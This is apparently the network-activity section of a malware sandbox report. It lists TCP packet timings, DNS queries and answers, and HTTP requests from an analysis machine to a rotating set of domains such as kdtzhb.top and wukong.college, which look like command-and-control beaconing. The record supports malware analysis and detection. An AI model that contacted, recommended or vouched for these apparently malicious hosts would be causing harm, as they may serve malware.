                                                                                        Nov 6, 2024 16:01:45.002873898 CET80497413.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:46.016784906 CET4974280192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:46.021826029 CET80497423.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:46.021904945 CET4974280192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:46.035428047 CET4974280192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:46.040503025 CET80497423.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:46.659946918 CET80497423.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:46.660106897 CET4974280192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:47.545691013 CET4974280192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:47.550731897 CET80497423.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:48.564390898 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:49.307164907 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:49.308008909 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:49.319799900 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:49.324690104 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:49.324800014 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:50.222573042 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:50.222645998 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:50.223664045 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:50.223711967 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:50.825823069 CET4974380192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:50.831166983 CET80497433.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:51.848097086 CET4974480192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:51.853526115 CET80497443.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:51.853595972 CET4974480192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:51.922350883 CET4974480192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:51.927476883 CET80497443.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:52.473377943 CET80497443.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:52.474633932 CET80497443.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:52.474673986 CET4974480192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:52.476592064 CET4974480192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:52.481645107 CET80497443.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:01:58.244836092 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:01:58.249851942 CET804974547.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:01:58.249913931 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:01:58.266865969 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:01:58.272511959 CET804974547.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:01:59.256027937 CET804974547.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:01:59.313668013 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:01:59.446922064 CET804974547.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:01:59.447036982 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:01:59.815679073 CET4974580192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:00.829099894 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:00.834003925 CET804974647.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:00.834115028 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:00.846220970 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:00.851049900 CET804974647.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:01.816914082 CET804974647.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:01.856892109 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:02.008589029 CET804974647.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:02.008699894 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:02.356988907 CET4974680192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:03.375881910 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:03.380927086 CET804974747.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:03.381104946 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:03.392417908 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:03.398269892 CET804974747.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:03.398313999 CET804974747.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:04.362221956 CET804974747.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:04.403821945 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:04.553662062 CET804974747.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:04.553730965 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:04.905644894 CET4974780192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:05.923741102 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:05.928653955 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:05.928719997 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:05.939378023 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:05.944184065 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:07.114680052 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:07.117245913 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:07.117341995 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:07.117430925 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:07.117430925 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:07.121651888 CET4974880192.168.2.847.52.221.8
                                                                                        Nov 6, 2024 16:02:07.126507044 CET804974847.52.221.8192.168.2.8
                                                                                        Nov 6, 2024 16:02:12.217765093 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:12.222831011 CET804974923.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:12.222913980 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:12.236635923 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:12.241656065 CET804974923.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:13.027827024 CET804974923.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:13.077625036 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:13.133052111 CET804974923.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:13.133657932 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:13.747538090 CET4974980192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:14.769628048 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:14.774583101 CET804975023.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:14.781706095 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:14.789623022 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:14.794708014 CET804975023.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:15.593745947 CET804975023.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:15.638135910 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:15.708977938 CET804975023.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:15.709033012 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:16.294604063 CET4975080192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:17.318176031 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:17.323261976 CET804975123.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:17.323411942 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:17.341619015 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:17.346571922 CET804975123.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:17.347063065 CET804975123.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:18.151864052 CET804975123.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:18.200623035 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:18.257029057 CET804975123.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:18.257124901 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:18.841361046 CET4975180192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:19.862824917 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:19.868144035 CET804975223.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:19.868220091 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:19.900156021 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:19.905149937 CET804975223.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:20.672406912 CET804975223.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:20.717614889 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:20.778609037 CET804975223.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:20.778852940 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:20.783970118 CET4975280192.168.2.823.106.59.18
                                                                                        Nov 6, 2024 16:02:20.788876057 CET804975223.106.59.18192.168.2.8
                                                                                        Nov 6, 2024 16:02:34.244836092 CET4975380192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:34.249686003 CET8049753208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:34.249757051 CET4975380192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:34.262506008 CET4975380192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:34.267330885 CET8049753208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:34.861283064 CET8049753208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:34.861358881 CET4975380192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:35.778759956 CET4975380192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:35.898998022 CET8049753208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:36.801583052 CET4975480192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:36.806385994 CET8049754208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:36.813572884 CET4975480192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:36.825593948 CET4975480192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:36.831317902 CET8049754208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:37.421328068 CET8049754208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:37.421607971 CET4975480192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:38.325674057 CET4975480192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:38.331007957 CET8049754208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:39.344834089 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:39.349730015 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:39.349860907 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:39.363594055 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:39.368467093 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:39.368597984 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:40.553761005 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:40.553864956 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:40.554442883 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:40.554503918 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:40.554800034 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:40.554840088 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:40.873564959 CET4975580192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:40.878566027 CET8049755208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:41.892931938 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:41.897813082 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:41.897895098 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:41.907115936 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:41.911937952 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:42.976943016 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:42.976991892 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:42.977005959 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:42.977122068 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:42.978435993 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:42.978718042 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:42.981555939 CET4975680192.168.2.8208.91.197.27
                                                                                        Nov 6, 2024 16:02:42.986270905 CET8049756208.91.197.27192.168.2.8
                                                                                        Nov 6, 2024 16:02:48.034312010 CET4975780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:48.039263010 CET80497573.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:48.039339066 CET4975780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:48.054140091 CET4975780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:48.059220076 CET80497573.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:48.664647102 CET80497573.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:48.664710999 CET4975780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:49.560036898 CET4975780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:49.566308975 CET80497573.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:50.579462051 CET4975880192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:50.586746931 CET80497583.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:50.586822987 CET4975880192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:50.599817991 CET4975880192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:50.604614973 CET80497583.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:51.218439102 CET80497583.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:51.218660116 CET4975880192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:52.106898069 CET4975880192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:52.111721039 CET80497583.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:53.125574112 CET4975980192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:53.130480051 CET80497593.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:53.130639076 CET4975980192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:53.145545006 CET4975980192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:53.150552988 CET80497593.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:53.150563955 CET80497593.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:53.795929909 CET80497593.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:53.795993090 CET4975980192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:54.653959990 CET4975980192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:54.659282923 CET80497593.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:55.677532911 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:55.682605982 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:55.685703993 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:55.693525076 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:55.698440075 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.323554993 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.324234009 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:02:56.324278116 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:56.327158928 CET4976080192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:02:56.333044052 CET80497603.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.319590092 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.324541092 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.324619055 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.332119942 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:13.336913109 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.974917889 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.981266975 CET80497613.33.130.190192.168.2.8
                                                                                        Nov 6, 2024 16:03:13.981317043 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:15.152443886 CET4976180192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:03:15.158137083 CET80497613.33.130.190192.168.2.8

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 6, 2024 15:59:37.625431061 CET6401653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 15:59:37.970403910 CET53640161.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 15:59:53.673338890 CET6266053192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 15:59:53.744705915 CET53626601.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:07.330297947 CET6366853192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:07.487843037 CET53636681.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:20.891988039 CET6291453192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:20.939755917 CET53629141.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:34.314397097 CET5995553192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:34.473757029 CET53599551.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:00:47.955921888 CET5335753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:00:48.365322113 CET53533571.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:02.508001089 CET5777753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:02.572767973 CET53577771.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:16.315160036 CET5571353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:16.365669966 CET53557131.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:29.986882925 CET5790353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:29.999608994 CET53579031.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:43.313997030 CET5435053192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:43.474385977 CET53543501.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:01:57.486531973 CET6262353192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:01:57.989701033 CET53626231.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:12.128015041 CET6123653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:12.214703083 CET53612361.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:25.827563047 CET5121953192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:25.879390955 CET53512191.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:33.956643105 CET5372653192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:34.241292953 CET53537261.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:02:47.987097025 CET6218753192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:02:48.030374050 CET53621871.1.1.1192.168.2.8
                                                                                        Nov 6, 2024 16:03:01.345509052 CET6160153192.168.2.81.1.1.1
                                                                                        Nov 6, 2024 16:03:01.432965994 CET53616011.1.1.1192.168.2.8

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 6, 2024 15:59:37.625431061 CET192.168.2.81.1.1.10x1ce0Standard query (0)www.corpseflowerwatch.orgA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 15:59:53.673338890 CET192.168.2.81.1.1.10xa2b0Standard query (0)www.4nk.educationA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:07.330297947 CET192.168.2.81.1.1.10xfe12Standard query (0)www.migraine-massages.proA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:20.891988039 CET192.168.2.81.1.1.10x1822Standard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:34.314397097 CET192.168.2.81.1.1.10xfd33Standard query (0)www.pluribiz.lifeA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:47.955921888 CET192.168.2.81.1.1.10xc630Standard query (0)www.kdtzhb.topA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:02.508001089 CET192.168.2.81.1.1.10x464aStandard query (0)www.evoo.websiteA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:16.315160036 CET192.168.2.81.1.1.10xe917Standard query (0)www.astorg-group.infoA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:29.986882925 CET192.168.2.81.1.1.10xef1dStandard query (0)www.fiqsth.vipA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:43.313997030 CET192.168.2.81.1.1.10x1469Standard query (0)www.bio-thymus.comA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:57.486531973 CET192.168.2.81.1.1.10xf0b5Standard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:12.128015041 CET192.168.2.81.1.1.10xb33eStandard query (0)www.vehiculargustav.clickA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:25.827563047 CET192.168.2.81.1.1.10x984eStandard query (0)www.bulls777.proA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:33.956643105 CET192.168.2.81.1.1.10xb624Standard query (0)www.yushaliu.onlineA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:47.987097025 CET192.168.2.81.1.1.10x811bStandard query (0)www.marketprediction.appA (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:03:01.345509052 CET192.168.2.81.1.1.10xe416Standard query (0)www.066bet.xyzA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 6, 2024 15:59:37.970403910 CET1.1.1.1192.168.2.80x1ce0No error (0)www.corpseflowerwatch.orgcorpseflowerwatch.orgCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 15:59:37.970403910 CET1.1.1.1192.168.2.80x1ce0No error (0)corpseflowerwatch.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 15:59:37.970403910 CET1.1.1.1192.168.2.80x1ce0No error (0)corpseflowerwatch.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 15:59:53.744705915 CET1.1.1.1192.168.2.80xa2b0No error (0)www.4nk.educationwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 15:59:53.744705915 CET1.1.1.1192.168.2.80xa2b0No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:07.487843037 CET1.1.1.1192.168.2.80xfe12No error (0)www.migraine-massages.pro199.59.243.227A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:20.939755917 CET1.1.1.1192.168.2.80x1822No error (0)www.vnxoso88.artvnxoso88.artCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:20.939755917 CET1.1.1.1192.168.2.80x1822No error (0)vnxoso88.art66.29.146.14A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:34.473757029 CET1.1.1.1192.168.2.80xfd33No error (0)www.pluribiz.life209.74.64.58A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:00:48.365322113 CET1.1.1.1192.168.2.80xc630No error (0)www.kdtzhb.top47.242.89.146A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:02.572767973 CET1.1.1.1192.168.2.80x464aNo error (0)www.evoo.website128.65.195.180A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:16.365669966 CET1.1.1.1192.168.2.80xe917No error (0)www.astorg-group.infowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:16.365669966 CET1.1.1.1192.168.2.80xe917No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:29.999608994 CET1.1.1.1192.168.2.80xef1dNo error (0)www.fiqsth.vipfiqsth.vipCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:29.999608994 CET1.1.1.1192.168.2.80xef1dNo error (0)fiqsth.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:29.999608994 CET1.1.1.1192.168.2.80xef1dNo error (0)fiqsth.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:43.474385977 CET1.1.1.1192.168.2.80x1469No error (0)www.bio-thymus.combio-thymus.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:43.474385977 CET1.1.1.1192.168.2.80x1469No error (0)bio-thymus.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:43.474385977 CET1.1.1.1192.168.2.80x1469No error (0)bio-thymus.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:01:57.989701033 CET1.1.1.1192.168.2.80xf0b5No error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:12.214703083 CET1.1.1.1192.168.2.80xb33eNo error (0)www.vehiculargustav.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:12.214703083 CET1.1.1.1192.168.2.80xb33eNo error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:25.879390955 CET1.1.1.1192.168.2.80x984eNo error (0)www.bulls777.probulls777.proCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:34.241292953 CET1.1.1.1192.168.2.80xb624No error (0)www.yushaliu.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:48.030374050 CET1.1.1.1192.168.2.80x811bNo error (0)www.marketprediction.appmarketprediction.appCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:48.030374050 CET1.1.1.1192.168.2.80x811bNo error (0)marketprediction.app3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:02:48.030374050 CET1.1.1.1192.168.2.80x811bNo error (0)marketprediction.app15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Nov 6, 2024 16:03:01.432965994 CET1.1.1.1192.168.2.80xe416Name error (3)www.066bet.xyznonenoneA (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.corpseflowerwatch.org
                                                                                        • www.4nk.education
                                                                                        • www.migraine-massages.pro
                                                                                        • www.vnxoso88.art
                                                                                        • www.pluribiz.life
                                                                                        • www.kdtzhb.top
                                                                                        • www.evoo.website
                                                                                        • www.astorg-group.info
                                                                                        • www.fiqsth.vip
                                                                                        • www.bio-thymus.com
                                                                                        • www.wukong.college
